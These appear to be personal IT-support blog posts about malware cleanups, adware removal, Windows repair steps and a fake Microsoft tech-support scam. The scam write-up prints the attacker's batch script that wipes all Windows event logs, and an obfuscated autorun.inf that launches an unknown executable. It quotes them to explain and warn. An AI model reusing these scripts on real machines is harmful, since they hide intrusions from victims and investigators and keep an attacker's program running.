TheSuperAdmins #006: No Computer Virus

With the Coronavirus becoming a big topic in the news, our IT department is also more or less aware of it...

See in big

See all comics

After a long time I could make another little comic, I hope the next one doesn't take that much time! Anyway, thanks for reading and I hope you enjoyed!

Fixing HDD and CPU always up to 100%

Today I could fix a case where a computer got incredible slow over the years, but it took to check lots of points...

First of all the issue was initially hard to figure out where it's coming from. 

Either the HDD in the Task Manager went up to 100% or the CPU - or both together. Even when no application was started. Narrowing down which service or application was at fault was difficult as well as it was always another one.

So I tried first with the 'obvious' solution which you find quite often online: Switching off services like 'Windows Search' or 'Superfetch'. Initially it seemed like no change at all. I even checked the hard disk since I even found sites where users where claiming having issues with the Toshiba DT01ACA100. But the HDD was fine so far, nothing visible with checking tools.

So what else... Such issues can come through viruses or malware so I gave Malwarebytes AntiMalware another go. And it found more than 4000 suspicious entries! After clearing them all and going for another reboot, let the software went through after to check if the malware is really gone and suddenly the issues got less!

Surely, right after booting the computer still took a while 'calm down' in terms after processor and hard disk usage. But then you could finally reproduce it by opening the Firefox browser and open certain websites. Or starting MS Office software.

Generally websites using flash took pushed the scale high again, but after certain tests to fix that issue within FF failed and I tried the same with Google Chrome which was faster and and slightly better.

And now after several restarts the computer finally seems fine again - hopefully it remains!

Chinese Tencent Software Removal

Suddenly you see a Chinese software popped up in your taskbar. But what is it and how do you get rid of it?

The user who contacted me previously tried to install a certain software by using a crack which seemingly failed and installed this 'tool' instead.

It caused lots of unnecessary pop ups in the browser and slows down the system in general. 

But the good news is that you can get rid of it. The bad news is, it's all in Chinese and if you don't know that language it could be difficult.

For me, knowing a bit of Japanese, helped to figure out a few characters. Like 出 means something like 'leave', 'go out' helped to close the software in the taskbar.

Once it's closed, you can proceed with uninstalling the software.

Once it's closed you need to go to the folder as seen in the screenshot above and scroll down to find a file called uninst.exe.
In the next step you need to be cautious in what you select:

• Seeing the next window, select the left option (not the green one!)
• At the next orange window you see three checkboxes - select the last one and proceed with clicking on the red button
• A last checkbox appears and there you should select the left button to complete the uninstall process

After a reboot it should all be fine again, but better check in the control panel under 'Programs & Features' if there's anything left (mostly at the bottom of the list written in Chinese). Try to uninstall other possible software like this as well.

Moreover, I also would suggest to scan the device for some possible malware remnants - my recommendation is Malwarebytes Anti-Malware.

So, try to stay free of certain software in the future!

Windows 10 flashing at the start, but why?

You start your Windows 10 and your desktop is flashing, flickering or let's say just becoming black, your desktop icons are disappearing and coming again every few seconds.

The only thing the might work is your task manager by pressing CTRL + ALT + DEL. Everything else in the background is gone and appearing again. It all looked like this:

It's all pretty annoying. A solution to have a booting scenario without all of this could be using the Safe Mode. It might be hard to get there at all, but if you make it to go to 'Run' and type 'msconfig' you can select Safe Mode for the next restart. Within this mode I experienced none of this disturbing flashing.

I often read that it's caused by the upgrade from Windows 7 or 8 to Windows 10. But in my case it was something else. Someone installed a certain suspicious 'driver updater' before the issue occurred. I removed the software of course, but the problem remained. I reinstalled a few drivers, but it didn't help. A malware scan with Malwarebytes Antimalware found more than 350 infections and cleaned them away, but the issue was still there. I found certain batch scripts while looking for a solution, but they didn't work either.

In general this issue is caused by a specific software or driver. But you have to find it to fix it.

So I reinstalled Windows 10, made the most sense since the computer only had a bit basic software installed and that was it. Saved the data, copied it back. Done. No issues anymore. The fastest and best way in cases like this.

Project Acer Aspire 5742g - First can't boot, then no AntiVirus

Someone brought me a laptop recently which wasn't able to boot anymore. The issue was solved easily, but after rebooting there was more...

It's all about an Acer Aspire 5742g, around five years old. The computer stops at the BIOS boot screen with the option 'Press <F2> to enter Setup'. Windows didn't boot anymore - at every attempt.

But you could still enter the BIOS and change settings without any freezing or anything. So I took a Live-Windows and booted it from the DVD drive - and it worked. I tested some HDD tools and it was all fine, I also had access to the data, no problem. But it still couldn't boot at all.

Then I opened the laptop and removed the hard disk from its cables to take it out for a few minutes. Couldn't see anything unusual and returned the hard disk back into the laptop. I turned the laptop on again and it suddenly worked, Windows 7 was able to boot.

After a few more starts the issue didn't occur again (even weeks later no problem), but I found out that the anti-virus software wasn't running anymore. And for how long? The owner didn't know. The laptop was also filled with lots of software the user wasn't aware about.

A virus scan with Malwarebytes AntiMalware showed more than 300 infections and we agreed to save the data and reinstall the machine. Better save than sorry.

Addonjet and a.karmakitty.info

What a crap...

Another case on malware cleaning shows how to get rid of the annoying karmakitty pop-ups in Google Chrome and unwished ads by Addonjet.

The computer is infected with malware and the web browser can't be used properly anymore. In every step you take another pop-up appears wanting you to call a phone number. In my case the problems only occured on Google Chrome.

Possible browser extensions which were also responsible for this couldn't be removed anymore. The settings menu closed when you attempted to open the extension list. Cleaning up the cache didn't help to solve this.

And there was no unwanted software installed so the fastest and most-effective way was to run a complete malware check. I recommend Malwarebytes Anti-Malware, which found a lot of infections.
After the clean-up and restart the whole issue was solved. Make sure your antivirus software is working properly or may get a better one.

A call from Microsoft 'to fix the issue'

Sometimes you hear stories about scammer pretending to work for Microsoft which are trying to get access to a private computer. Their victims are gullible people which called directly at home. Lately I got to see a Windows 7 system where such a 'helpdesk guy' had access...

It all starts with a phone call where these guys say they're from Microsoft and on the computer is an issue to be fixed. 

Interestingly, they're are even calling people in Germany only speaking English and just a bit of German.

In case there were comprehension problem they used internet translation tools to move forward and they always said when this procedure costs something, they will say it (as seen later...).

Getting access

To show the people that they're trustworthy they mention a combination of numbers and later show them the exact same digits somewhere on the computer. I don't know which numbers, but obviously a combination which is on all Windows machines the same.

For getting the access they're letting their victims go to https://showmypc.com to download a remote support tool. This tool apparently includes a service and a version of Tight VNC.

Additionally they are using the tool "LogMeIn Rescue" (https://secure.logmein.com) for file transfer. Then they're copying a txt file to the desktop with following three lines to 'prove' they're real:

My Name = Christopher winter
My Employee ID = MS98646
Our Email Address = support@microsoft.com

The 'cleaning'

During this remote session the tool ATF cleaner was copied to the computer. According to the website (www.atribune.org) this software is from 2006 - so for Windows 2000 and Windows XP. There are extra notes added for the support of Windows Vista. 

The tool is just able to delete cache from Firefox and Opera. Concerning its age the only reason for using this exe must be to distract from something. Maybe from the batch file which was copied and executed shortly afterwards - name: CLEANER.bat.

Correct me, if I'm wrong, but its purpose is to get admin access and delete the event logs.

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

By that time the fake support guy said that he wants to install a special cleaning software for something around 90 euros. He couldn't send an email or other information material. It was about just installing it now or not. After that the user of the computer ended the call.

The CLEANER.bat wasn't deleted properly, because I found it in the Recycle Bin. But the eventlog was starting from new...

Further traces

In 'Run' (Windows+R) I found the following commands which were last used: 

iexplorer support.me (leads to https://secure.logmeinrescue.com/Customer/Code.aspx)

services.msc

eventvwr

certmgr.msc

prefetch

winver

msconfig

Looking for further hints for what has been done, I saw two suspicious files where the changing time was exactly during the end of the time when the support had access. In the root folder of the second hard drive is a pwdx.exe and an autorun.inf which should open the exe-file (see below).

;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1

About the pwdx.exe I'm not sure what that exactly is. I only found the information that it's a maybe a Linux-based monitoring tool. Please comment, if you know more.

Anyway, the computer was filled with these virus warning windows as seen on the right. And there was also a warning message from the internet service provider the next day.

During the time the session was running, anything could have been done. These are just the few things I've found in a short amount of time.

After this event the computer wasn't connected to the internet anymore. A reinstallation was more than necessary...

Note: If anybody knows more about these fake helpdesk people or has his oder her experiences about it, feel free to comment. 

Windows Updates not working after malware cleanup

A Windows 7 computer was infected with some viruses, malware etc. and after a successful cleaning procedure there remained one visible problem: Windows Update is not working anymore.

While trying to search for further updates the following message appeared:

Windows Update cannot currently check for updates because the service is not running.

But the service is definitely running. To fix this the following steps need to be done:

1. Open services.msc (or go to computer management) to stop the Windows Update service.

2. Go to C:\Windows and rename the folder "SoftwareDistribution" to something like "SoftwareDistribution_old".

3. Restart the Windows Update service and restart the computer. The folder will be recreated.

4. Go to Windows Update again and search for updates. This time you're offered to install "New Windows Update software". Confirm it.

5. Following that the search for updates seems endless only to end up with error messages like these two: 0x80072EE2 or 0x8007000E. It won't continue.

And there they are...

6. So now go to Internet Explorer to the options and reset the settings and cache completely. Restart your computer and all of a sudden the updates will appear.

Anyway: After such virus problems there can be several other things damaged in the operating system. The safest and most recommended way would be to save the data and reinstall the OS. This is just a quick fix to get Windows Update working again.